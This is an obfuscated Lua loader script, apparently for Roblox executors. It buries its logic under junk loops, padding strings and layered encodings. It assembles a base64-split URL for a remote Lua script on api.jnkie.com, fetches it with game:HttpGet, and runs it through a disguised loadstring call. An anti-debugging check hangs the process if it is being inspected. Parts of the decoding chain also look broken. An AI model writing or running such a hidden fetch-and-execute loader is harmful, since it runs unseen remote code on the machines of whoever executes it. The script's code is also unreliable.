local _ = string
local __ = table
local ___ = math
local ____ = coroutine
local _____ = debug
local ______ = os
local _______ = game
local ________ = _______ and _______.HttpGet

local a0,b0,c0,d0,e0,f0,g0,h0,i0,j0,k0,l0,m0,n0,o0,p0,q0,r0,s0,t0,u0,v0,w0,x0,y0,z0,A0,B0,C0,D0,E0,F0,G0,H0,I0,J0,K0,L0,M0,N0,O0,P0,Q0,R0,S0,T0,U0,V0,W0,X0,Y0,Z0
for Z0=1,999 do
    a0={};b0={};c0={};d0={};e0={};f0={};g0={};h0={};i0={};j0={};k0={};l0={};m0={};n0={};o0={};p0={};q0={};r0={};s0={};t0={};u0={};v0={};w0={};x0={};y0={};z0={};A0={};B0={};C0={};D0={};E0={};F0={};G0={};H0={};I0={};J0={};K0={};L0={};M0={};N0={};O0={};P0={};Q0={};R0={};S0={};T0={};U0={};V0={};W0={};X0={};Y0={}
    a0[Z0]=___.random(1,999999)
    b0[Z0]=_.char(___.random(33,126))
    c0[Z0]=function()return Z0*___.random()end
    d0[Z0]={Z0,Z0*Z0,Z0*Z0*Z0}
    e0[Z0]=____.create(function()____.yield(Z0)end)
    f0[Z0]=setmetatable({},{__index=function()return Z0 end})
    g0[Z0]=function()return Z0*___.random(1,100)end
    h0[Z0]={[1]=Z0,[2]=Z0*2,[3]=Z0*3,[4]=Z0*4,[5]=Z0*5}
    i0[Z0]=____.wrap(function()return Z0 end)
    j0[Z0]=function()return _.rep(_.char(___.random(65,90)),___.random(10,100))end
    k0[Z0]={[1]=Z0,[2]=Z0+100,[3]=Z0*10,[4]=Z0/2,[5]=Z0%7}
    l0[Z0]=___.sin(Z0)*___.cos(Z0)*___.tan(Z0)
    m0[Z0]=_____ and _____.getinfo and _____.getinfo(2)or{}
    n0[Z0]=function()return _.char(___.random(97,122)).._.char(___.random(65,90)).._.char(___.random(48,57))end
    o0[Z0]=___.random(-9999,9999)
    p0[Z0]={___.random(),___.random(),___.random(),___.random(),___.random()}
    q0[Z0]=____.create(function()for _=1,___.random(10,100)do ____.yield(_)end end)
    r0[Z0]=function()return _.format("%x",Z0*___.random())end
    s0[Z0]=_____ and _____.traceback and _____.traceback()or""
    t0[Z0]=___.floor(___.sin(Z0)*1000)/1000
    u0[Z0]=bit32 and bit32.bxor(Z0,___.random(1,255))or Z0
    v0[Z0]=_____ and _____.getupvalue(function()end,1)or nil
    w0[Z0]=newproxy and newproxy(true)or{}
    x0[Z0]=getmetatable and getmetatable(w0[Z0])or{}
    y0[Z0]=function()return _.rep(_.char(___.random(33,126)),___.random(500,1000))end
    z0[Z0]={Z0,Z0+1,Z0+2,Z0+3,Z0+4}
    A0[Z0]=____.wrap(function()for i=1,___.random(10,50)do ____.yield(i)end end)
    B0[Z0]=_.len and _.len(_.dump(function()end))or 0
    C0[Z0]=___.random()>0.5 and"A"or"B"
    D0[Z0]=function()return _.char(___.random(65,90))end
    E0[Z0]={a=Z0,b=Z0*2,c=Z0*3}
    F0[Z0]=setmetatable({},{__index=E0[Z0]})
    G0[Z0]=___.random(1,1000)%2==0 and true or false
    H0[Z0]=_____ and _____.getregistry and _____.getregistry()[Z0]or nil
    I0[Z0]=_.gsub(_.rep("A",Z0),"A",function()return _.char(___.random(65,90))end)
    J0[Z0]=___.max(Z0,___.random(1,999))
    K0[Z0]=___.min(Z0,___.random(1,999))
    L0[Z0]=___.abs(Z0-___.random(1,999))
    M0[Z0]=___.floor(___.log(Z0+1))
    N0[Z0]=___.ceil(___.exp(Z0%10))
    O0[Z0]=___.sqrt(Z0*Z0+___.random())
    P0[Z0]=___.sin(Z0)+___.cos(Z0)
    Q0[Z0]=___.tan(Z0)*___.atan(Z0)
    R0[Z0]=___.deg(___.rad(Z0))
    S0[Z0]=___.frexp(Z0)
    T0[Z0]=___.ldexp(1,Z0%10)
    U0[Z0]=___.pow(Z0,2)
    V0[Z0]=___.modf(Z0+___.random())
    W0[Z0]=___.fmod(Z0,7)
    X0[Z0]=___.randomseed(___.random(1,999999))
    Y0[Z0]=_.byte("A")==65 and true or false
end

local _0x1a="@#$%^&*()_+{}[]|\\:;\"'<>?,./"
local _0x2b="฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿฿"
local _0x3c="####################################################################################################"
local _0x4d="****************************************************************************************************"
local _0x5e="~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
local _0x6f="`!@#$%^&*()-=_+[]{}|;:',.<>/?`!@#$%^&*()-=_+[]{}|;:',.<>/?`!@#$%^&*()-=_+[]{}|;:',.<>/?`!@#$%^&*()-=_+[]{}|;:',.<>/?`!@#$%^&*()-=_+[]{}|;:',.<>/?`!@#$%^&*()-=_+[]{}|;:',.<>/?"
local _0x70=_0x1a.._0x2b.._0x3c.._0x4d.._0x5e.._0x6f

local function _0x71()return _0x70 end
local function _0x72()return _.rep(_0x70,___.random(1,999))end
local function _0x73()local a=""for _=1,___.random(100,999)do a=a.._0x70 end return a end
local function _0x74()local a={}for _=1,100 do a[_]=_0x70 end return _.concat(a)end

local function _0x75(s,k)local r={}for i=1,#s do r[i]=_.char(_.byte(s,i)~=(k or ___.random(1,255))%256)end return _.concat(r)end
local function _0x76(s)return _.reverse(s)end
local function _0x77(s)
    local b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    return(s:gsub('.',function(x)local r,b='',x:byte()for i=8,1,-1 do r=r..(b%2^i-b%2^(i-1)>0 and'1'or'0')end return r end):gsub('....',function(x)local n=0 for i=1,4 do n=n+(x:sub(i,i)=='1'and 2^(4-i)or 0)end return b:sub(n+1,n+1)end)..({['']='',['1']='=',['11']=='=='})[#s%3])
end
local function _0x78(s)
    local b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    s=s:gsub('[^'..b..'=]','')
    return(s:gsub('.',function(x)if x=='='then return''end local r,f='',b:find(x)-1 for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and'1'or'0')end return r end):gsub('.?.?.?.?.?.?.?.?',function(x)if #x~=8 then return''end local n=0 for i=1,8 do n=n+(x:sub(i,i)=='1'and 2^(8-i)or 0)end return _.char(n)end))
end
local function _0x79(s)return(s:gsub('.',function(c)return _.format('%02x',_.byte(c))end))end
local function _0x7a(s)return(s:gsub('..',function(h)return _.char(tonumber(h,16))end))end
local function _0x7b(s,shift)return(s:gsub('%a',function(c)local base=c:match('%l')and 97 or 65 return _.char((c:byte()-base+shift)%26+base)end))end
local function _0x7c(s,shift)return(s:gsub('%a',function(c)local base=c:match('%l')and 97 or 65 return _.char((c:byte()-base-shift)%26+base)end))end
local function _0x7d(s)return _.gsub(s,'.',function(c)return _.char(255-_.byte(c))end)end

local function _0x7e()return"aHR0cHM6"end
local function _0x7f()return"Ly9hcGku"end
local function _0x80()return"am5raWUu"end
local function _0x81()return"Y29tL2Fw"end
local function _0x82()return"aS92MS9s"end
local function _0x83()return"dWFzY3Jp"end
local function _0x84()return"cHRzL3B1"end
local function _0x85()return"YmxpYy8w"end
local function _0x86()return"Y2UyYzRl"end
local function _0x87()return"ODgzZjkw"end
local function _0x88()return"MWY5MzY5"end
local function _0x89()return"MzBmNGVk"end
local function _0x8a()return"MzFjNTQz"end
local function _0x8b()return"NDM2OWI5"end
local function _0x8c()return"OTUyNmZi"end
local function _0x8d()return"Yjg1ZDYz"end
local function _0x8e()return"NTZhNzUz"end
local function _0x8f()return"Zjg1Mjk5"end
local function _0x90()return"OWJiYjhi"end
local function _0x91()return"L2Rvd25s"end
local function _0x92()return"b2Fk"end

local _0x93={_0x7e,_0x7f,_0x80,_0x81,_0x82,_0x83,_0x84,_0x85,_0x86,_0x87,_0x88,_0x89,_0x8a,_0x8b,_0x8c,_0x8d,_0x8e,_0x8f,_0x90,_0x91,_0x92}
local _0x94=function()
    local a=""
    for _=1,21 do a=a.._0x93[_]()end
    return a
end

local function _0x95()
    local a=_0x94()
    for _=1,5 do
        a=_0x78(a)
        a=_0x79(a)
        a=_0x75(a,69)
        a=_0x76(a)
        a=_0x7b(a,_)
    end
    return a
end

local function _0x96()
    local a=_0x95()
    for _=1,5 do
        a=_0x77(a)
        a=_0x7a(a)
        a=_0x75(a,42)
        a=_0x76(a)
        a=_0x7c(a,_)
        a=_0x7d(a)
    end
    return a
end

local _0x97={}
for _=1,40 do _0x97[_]=function()return _.sub(_0x96(),(_-1)*8+1,_*8)end end

local function _0x98()
    local a={}
    for _=1,40 do a[_]=_0x97[_]()end
    return _.concat(a)
end

local function _0x99()
    local a=_0x98()
    local b={}
    local c=1
    local d=1
    local e=0
    local f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    for g=1,#a do
        local h=a:sub(g,g)
        local i=f:find(h)and f:find(h)-1
        if i then
            e=e*64+i
            c=c+1
            if c>4 then
                c=1
                for k=1,3 do
                    local l=___.floor(e/2^(24-8*(k-1)))%256
                    b[d]=_.char(l)
                    d=d+1
                end
                e=0
            end
        end
    end
    return _.concat(b)
end

if not _______or not ________then return end
if _____and _____.getinfo then local _=_____.getinfo(1)end
if _____and _____.traceback and #_____.traceback()<50 then while true do end end

for _=1,500 do
    ____.wrap(function()
        for __=1,20 do ___.random() ___.sin(___.random()) end
    end)()
end

local _0x9a={}
for _=1,20 do _0x9a[_]=function()return _0x99()end end
local _0x9b=_0x9a[___.random(1,20)]()

local _0x9c=_.char(108).._.char(111).._.char(97).._.char(100).._.char(115).._.char(116).._.char(114).._.char(105).._.char(110).._.char(103)
local _0x9d=_G[_0x9c]
if _0x9d then
    local _0x9e=________(_______,_0x9b)
    _0x9d(_0x9e)()
end
